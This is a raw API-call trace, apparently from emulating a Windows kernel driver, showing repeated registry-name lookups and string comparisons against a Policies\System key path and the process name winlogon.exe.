| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78fea90, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78fea90, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0xa2, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\Common\ClientTelemetry, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78fea90, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa4, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b78fea90, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b78fea90, Length = 0xa2, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\Common\ClientTelemetry, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7bd5a40, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7bd5a40, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7bd5a40, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
